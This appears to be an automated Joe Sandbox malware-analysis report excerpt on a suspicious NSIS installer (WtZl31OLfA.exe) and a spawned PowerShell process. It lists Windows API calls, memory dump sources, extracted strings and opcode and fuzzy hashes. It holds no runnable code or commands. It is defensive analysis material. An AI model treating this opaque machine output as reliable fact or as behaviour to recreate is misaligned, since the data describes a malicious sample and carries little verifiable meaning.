• Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
Similarity
• API ID: CloseCreateValuelstrlen
• String ID:
• API String ID: 1356686001-0
• Opcode ID: 1524d7add36cd9fcde37d92f9eca7493f501d411afb00e955b7e8f2a6300b093
• Instruction ID: 52a733b9c8e4ab95676b633cdda8f3d85a752b7ae8d5fcc25206d9d14f9091af
• Opcode Fuzzy Hash: 1524d7add36cd9fcde37d92f9eca7493f501d411afb00e955b7e8f2a6300b093
• Instruction Fuzzy Hash: A4118E71A00108BFEB11AFA5DE89DAE777DEB44358F11403AF904B61D1DBB85E409668
APIs
• DestroyWindow.USER32(00000000,00000000,00402F6A,00000001,?,?,"C:\Users\user\Desktop\WtZl31OLfA.exe",00403536,?), ref: 00402D9D
• GetTickCount.KERNEL32 ref: 00402DBB
• CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
• ShowWindow.USER32(00000000,00000005,?,?,"C:\Users\user\Desktop\WtZl31OLfA.exe",00403536,?), ref: 00402DE6
Memory Dump Source
• Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
Similarity
• API ID: Window$CountCreateDestroyDialogParamShowTick
• String ID:
• API String ID: 2102729457-0
• Opcode ID: df109012b7806b8de8df2929ec67b86acfc6093236d2d9f47b9f955c0080d778
• Instruction ID: 9565580f91e6c8b036764476f8379a8a9497e0cf8b36b33943f0ae23fa557cda
• Opcode Fuzzy Hash: df109012b7806b8de8df2929ec67b86acfc6093236d2d9f47b9f955c0080d778
• Instruction Fuzzy Hash: FFF05E30501520BBC671AB20FF4DA9B7B64FB40B11701447AF042B15E4C7B80D828B9C
                                                                                APIs
                                                                                  • Part of subcall function 00406050: lstrcpynW.KERNEL32(?,?,00000400,0040334D,Serrasalmo Setup,NSIS Error), ref: 0040605D
                                                                                  • Part of subcall function 00405AAF: CharNextW.USER32(?,?,0042FA50,?,00405B23,0042FA50,0042FA50,75923420,?,C:\Users\user\AppData\Local\Temp\,00405861,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405ABD
                                                                                  • Part of subcall function 00405AAF: CharNextW.USER32(00000000), ref: 00405AC2
                                                                                  • Part of subcall function 00405AAF: CharNextW.USER32(00000000), ref: 00405ADA
                                                                                • lstrlenW.KERNEL32(0042FA50,00000000,0042FA50,0042FA50,75923420,?,C:\Users\user\AppData\Local\Temp\,00405861,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B65
                                                                                • GetFileAttributesW.KERNEL32(0042FA50,0042FA50,0042FA50,0042FA50,0042FA50,0042FA50,00000000,0042FA50,0042FA50,75923420,?,C:\Users\user\AppData\Local\Temp\,00405861,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 00405B75
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B0C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                • API String ID: 3248276644-823278215
                                                                                • Opcode ID: 1860d25d1cedceeae653fbc66b59fe140c8df0ce2729e3c8c9131a1b177ba99c
                                                                                • Instruction ID: 63a6569c831ee5581447f3e1e8ec18e6ac74a78ddfb021a14ce772f4501d9fee
                                                                                • Opcode Fuzzy Hash: 1860d25d1cedceeae653fbc66b59fe140c8df0ce2729e3c8c9131a1b177ba99c
                                                                                • Instruction Fuzzy Hash: 32F0F435100E1119D62632361C49BAF2664CF82324B4A023FF952B22D1DB3CB993CC7E
                                                                                APIs
                                                                                • IsWindowVisible.USER32(?), ref: 00405152
                                                                                • CallWindowProcW.USER32(?,?,?,?), ref: 004051A3
                                                                                  • Part of subcall function 00404160: SendMessageW.USER32(00010458,00000000,00000000,00000000), ref: 00404172
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                • String ID:
                                                                                • API String ID: 3748168415-3916222277
                                                                                • Opcode ID: 340d3c0ef1b6191d39bf660b6c525c67a0e16f797af015efc8e2bb8f4ca6604a
                                                                                • Instruction ID: 3a757cf3c9e7612e230a46be1b13aa2d047f9f757cddf2eb8b5381add8f22129
                                                                                • Opcode Fuzzy Hash: 340d3c0ef1b6191d39bf660b6c525c67a0e16f797af015efc8e2bb8f4ca6604a
                                                                                • Instruction Fuzzy Hash: 43017C71A00609ABEB218F51ED84B9B3B2AEB84750F504037F6047D1E0C77A8C929E2A
                                                                                APIs
                                                                                • FreeLibrary.KERNEL32(?,75923420,00000000,C:\Users\user\AppData\Local\Temp\,004037DC,004035F2,?), ref: 0040381E
                                                                                • GlobalFree.KERNEL32(?), ref: 00403825
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403804
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: Free$GlobalLibrary
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                • API String ID: 1100898210-823278215
                                                                                • Opcode ID: da2816148213eaf2ca9be615ca64e0b95c5ba1132a9b108e3e9160e8cd70995f
                                                                                • Instruction ID: c0ef5988400ca03a2919d730679f4c8cdc7c60ab336a91eb80d60266565c467d
                                                                                • Opcode Fuzzy Hash: da2816148213eaf2ca9be615ca64e0b95c5ba1132a9b108e3e9160e8cd70995f
                                                                                • Instruction Fuzzy Hash: D2E0C2735015309BC6212F45ED0871EB7ACAF59B22F0580BAF8907B26087781C428FD8
                                                                                APIs
                                                                                • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\WtZl31OLfA.exe,C:\Users\user\Desktop\WtZl31OLfA.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\WtZl31OLfA.exe",00403536,?), ref: 00405A56
                                                                                • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\WtZl31OLfA.exe,C:\Users\user\Desktop\WtZl31OLfA.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\WtZl31OLfA.exe",00403536,?), ref: 00405A66
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: CharPrevlstrlen
                                                                                • String ID: C:\Users\user\Desktop
                                                                                • API String ID: 2709904686-1246513382
                                                                                • Opcode ID: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
                                                                                • Instruction ID: 94586c4fc4af0aa81d4ff890ae3cf2b30e5be6a9e55ec7b9bf63862dfaa4d6e2
                                                                                • Opcode Fuzzy Hash: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
                                                                                • Instruction Fuzzy Hash: 0ED05EB2411920AAC312A714DD44DAF73ACEF123007464466F441A6161D7785D818AAD
                                                                                APIs
                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9A
                                                                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BB2
                                                                                • CharNextA.USER32(00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BC3
                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BCC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                • String ID:
                                                                                • API String ID: 190613189-0
                                                                                • Opcode ID: e0aa3f8b5d9062cafbb7b658161da2b40476d8243bb4b83799a9e8f5804b25e7
                                                                                • Instruction ID: 8848f7d8d782bbf7f3224fb8fd0babd0dea9e1ab2e05ea72f699364142252924
                                                                                • Opcode Fuzzy Hash: e0aa3f8b5d9062cafbb7b658161da2b40476d8243bb4b83799a9e8f5804b25e7
                                                                                • Instruction Fuzzy Hash: 72F0C231100914EFCB029FA5CD4099FBFB8EF06350B2540A9E840F7311D674FE019BA8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2289777158.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7940000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (fvl$(fvl$4'eq$4'eq$4'eq$4'eq$4sl$4sl$x.gk$x.gk$-gk
                                                                                • API String ID: 0-1689887990
                                                                                • Opcode ID: dbb15e12f727549210d860607f69ad5816207bf089309022a68718912f8c337b
                                                                                • Instruction ID: 0dd54f18815e4978ec71ed36b0994a1369eb58dc89c6d0e6570033bafb01342c
                                                                                • Opcode Fuzzy Hash: dbb15e12f727549210d860607f69ad5816207bf089309022a68718912f8c337b
                                                                                • Instruction Fuzzy Hash: 8D925EB4A00214DFDB64DB18CD51FAABBB2EB85344F1180E5D9095B751CB72EE81CFA2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2289777158.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7940000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (fvl$(fvl$4'eq$4'eq$4'eq$4'eq$x.gk$-gk
                                                                                • API String ID: 0-4178824134
                                                                                • Opcode ID: 639f37ff50dda0534cadb1af5c71b163085d85f2adcccec4b0e732753d02927b
                                                                                • Instruction ID: 158bed2f3134658d28a1a577f80a34c0948a272e3a12b2eac536d4eb9b50ddbb
                                                                                • Opcode Fuzzy Hash: 639f37ff50dda0534cadb1af5c71b163085d85f2adcccec4b0e732753d02927b
                                                                                • Instruction Fuzzy Hash: 59E17DB4A102099FCB14DFA9C951FAEBBA2AFC4308F14C469D9016F795CB72ED41CB91
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2289777158.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7940000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (fvl$4'eq$4'eq$x.gk$-gk
                                                                                • API String ID: 0-1233961443
                                                                                • Opcode ID: e401e87fa8facec51e74c46ccec6cd7c6ad760e1752582f946804e9938e22976
                                                                                • Instruction ID: 024e7bad0708566615dc4f8d8f136ddd109ac3ab09e2f12dd69a0bf20e1ba2f6
                                                                                • Opcode Fuzzy Hash: e401e87fa8facec51e74c46ccec6cd7c6ad760e1752582f946804e9938e22976
                                                                                • Instruction Fuzzy Hash: FBC1AFB4A002099FCB14DFA9C941FAEBBB2EF88308F14C569D9056F755CB72E941CB91
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2289777158.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7940000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'eq$4'eq$x.gk$-gk
                                                                                • API String ID: 0-3655877032
                                                                                • Opcode ID: 38bbb5a867555e70136423dd709e854168f50c67c62061f44e4d70df18a22153
                                                                                • Instruction ID: e4c77c09f4bfca00d11f9efa66b7aa6b0e0a6e46a6f50253298b9ddafeb19040
                                                                                • Opcode Fuzzy Hash: 38bbb5a867555e70136423dd709e854168f50c67c62061f44e4d70df18a22153
                                                                                • Instruction Fuzzy Hash: EF425CB4A002149FDB64DF58C951FAABBB2EB85304F10C0A9D9099F756CB72ED81CF91
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2289777158.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7940000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'eq$4'eq$4'eq$4'eq
                                                                                • API String ID: 0-733111579
                                                                                • Opcode ID: fbd92cd3394b43c4279e3f4a669f337f456d7350c20a7d8f070878f1e96105de
                                                                                • Instruction ID: c557292cc7bafbd2491bf83989e000866138912c6d01f677f48036bb5c440e2e
                                                                                • Opcode Fuzzy Hash: fbd92cd3394b43c4279e3f4a669f337f456d7350c20a7d8f070878f1e96105de
                                                                                • Instruction Fuzzy Hash: 51126CB1B042558FCB259B79C811B6A7BA6BFC6318F1480BBE505CF692DB31CD41C7A2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2289777158.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7940000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (fvl$4'eq$4sl$x.gk
                                                                                • API String ID: 0-659791527
                                                                                • Opcode ID: 2763550204118bc784d9dd73bd79f1dcc6eb7b83ed9a6b8c7a503bf747e15106
                                                                                • Instruction ID: 2fed51296601be77f5bd7981086dc0fa9484bf683255b1022791057d869c5533
                                                                                • Opcode Fuzzy Hash: 2763550204118bc784d9dd73bd79f1dcc6eb7b83ed9a6b8c7a503bf747e15106
                                                                                • Instruction Fuzzy Hash: AA126DB4A01215DFDB64CB18CD51FAAB7B2BB86308F1181E4D9096B751CB72EE81CF61
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2289777158.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7940000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (fvl$4'eq$4sl$x.gk
                                                                                • API String ID: 0-659791527
                                                                                • Opcode ID: ddc745be69f91e802b8a8f9cb2ae3cea94e6e0c1715282e4d6931b4588fa8bac
                                                                                • Instruction ID: 5c3b1dfbf02f3615b100cd7c78e6f69d29c19bdabec562d87a49754d502c7633
                                                                                • Opcode Fuzzy Hash: ddc745be69f91e802b8a8f9cb2ae3cea94e6e0c1715282e4d6931b4588fa8bac
                                                                                • Instruction Fuzzy Hash: 77E15CB4A01215DFDB64CB14CD51FAAB7B2BB86304F1081E4D909AB751CB72EE81CF62
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2289777158.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7940000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'eq$x.gk$-gk
                                                                                • API String ID: 0-1873619579
                                                                                • Opcode ID: 4168fe337a42e0f399ebc22983c03a334fee4f2b19efd4b5f1ce19edc6c1d0ed
                                                                                • Instruction ID: c8a55b35cc6a42bdc7f8951d705290f23ea9ee22dd679ee1bbc689e1279aaf85
                                                                                • Opcode Fuzzy Hash: 4168fe337a42e0f399ebc22983c03a334fee4f2b19efd4b5f1ce19edc6c1d0ed
                                                                                • Instruction Fuzzy Hash: 03526CB4B002149FDB64DF18C951F6ABBB2EB85308F10C0A5DA099B756CB72ED81CF91
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2289777158.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7940000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'eq$x.gk$-gk
                                                                                • API String ID: 0-1873619579
                                                                                • Opcode ID: 44a84a41362372f515e6ff82e36bee700278699a2ad640f4ee8b059c62119f9f
                                                                                • Instruction ID: bec3ed6928c8d0d5ed8de408ccfcf8afdb529d84da67a7f43628c2fe3f439a42
                                                                                • Opcode Fuzzy Hash: 44a84a41362372f515e6ff82e36bee700278699a2ad640f4ee8b059c62119f9f
                                                                                • Instruction Fuzzy Hash: 31426EB4B002149FDB64DB18CD51FAABBB2EB85344F1180E5D9095F751CB72ED828FA2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2289777158.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7940000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'eq$x.gk$-gk
                                                                                • API String ID: 0-1873619579
                                                                                • Opcode ID: d3675914db64d06d8866b87051fa98ce8aab866060266da0b6bbfb2c28c83977
                                                                                • Instruction ID: 4145148020e98a110deb96cfd9af8fa80442d7c3daf7a8675bcad0fb11443928
                                                                                • Opcode Fuzzy Hash: d3675914db64d06d8866b87051fa98ce8aab866060266da0b6bbfb2c28c83977
                                                                                • Instruction Fuzzy Hash: A8224EB4A002149FD764DF18C951FAABBB2EB85308F11C0A5DA099F752CB72ED85CF91
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2289777158.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7940000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'eq$x.gk$-gk
                                                                                • API String ID: 0-1873619579
                                                                                • Opcode ID: 6e5569aefd509e4164199fa589fa5349200b8070c0e056b58061523ceb9fab53
                                                                                • Instruction ID: b338d28f35f1a6a1ba22559839f7a2a4978d352495e7dc9fefd9f502978abbe1
                                                                                • Opcode Fuzzy Hash: 6e5569aefd509e4164199fa589fa5349200b8070c0e056b58061523ceb9fab53
                                                                                • Instruction Fuzzy Hash: 0B125FB4B002149FD754DB18CD51FAABBB2EB85344F1180E5D9095F791CB72EE828FA2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2289777158.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7940000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $eq$$eq$$eq
                                                                                • API String ID: 0-177832560
                                                                                • Opcode ID: 717bf05c4ae8103c415d474be9dc5e7673a097c991b948f322fb4924d0bdb5bf
                                                                                • Instruction ID: aba1cdadc2aea793c087c57d61463d0a68816b6c52f4f64738de61758f76f73f
                                                                                • Opcode Fuzzy Hash: 717bf05c4ae8103c415d474be9dc5e7673a097c991b948f322fb4924d0bdb5bf
                                                                                • Instruction Fuzzy Hash: 7E415AB2B001269BCF649E79D841A6FFBF5AFC4214B14857AC805FB284DB32D910C7E5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2289777158.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7940000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $eq$$eq$$eq
                                                                                • API String ID: 0-177832560
                                                                                • Opcode ID: d7d8b79b16787a220978d0e09d44aabfdaf5bb605b4e9faec149849766e98c7a
                                                                                • Instruction ID: 81daf3597c068e8dcf706e861f9e48f95d7be1e25fb2722b1e5a73404798f080
                                                                                • Opcode Fuzzy Hash: d7d8b79b16787a220978d0e09d44aabfdaf5bb605b4e9faec149849766e98c7a
                                                                                • Instruction Fuzzy Hash: E1317CF29012159FCF609F79C440AAFBBF9AF84214B1845AAC809FB281E731D901CBA5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2289777158.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7940000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $eq$$eq$$eq
                                                                                • API String ID: 0-177832560
                                                                                • Opcode ID: bda07ee8002cbdc742de35ca6bb99a953551edef20de238bb6371dd690178c7a
                                                                                • Instruction ID: 1a1b2a3eb421db1719773eff1d7873ec45f3e98e108c73dafb89648932d70591
                                                                                • Opcode Fuzzy Hash: bda07ee8002cbdc742de35ca6bb99a953551edef20de238bb6371dd690178c7a
                                                                                • Instruction Fuzzy Hash: C02168F27102869BDF74997A9841F37B7DA9BC131DF24843A9905CB292DE75C8408362
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2289777158.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7940000_powershell.jbxd
                                                                                Similarity
